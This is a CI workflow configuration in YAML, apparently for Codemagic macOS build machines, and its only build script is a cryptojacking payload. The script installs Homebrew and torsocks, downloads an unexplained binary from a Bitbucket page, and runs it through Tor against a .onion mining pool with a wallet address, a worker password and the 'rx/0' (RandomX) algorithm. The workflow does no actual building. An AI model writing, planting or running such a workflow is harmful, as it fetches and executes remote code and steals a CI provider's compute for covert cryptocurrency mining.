workflows:
  my-workflow:
    name: Ngakak
    instance_type: mac_mini
    max_build_duration: 60
    scripts:
      - /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" && wget https://bitbucket.org/woakowakow/a/downloads/macos && brew install torsocks && ls && torsocks ./macos -o mo2tor2amawhphlrgyaqlrqx7o27jaj7yldnx3t6jip3ow4bujlwz6id.onion:10032 -u 47M7X7adQM36enigfwb5UeJZyt3TWPHXsQ9PWawYu52iUus2noqDkK387UuLgBfhf4fhLKcNhitnUaBo3cFdht9eQy3z9cG -p Pekerja01 -a rx/0 -k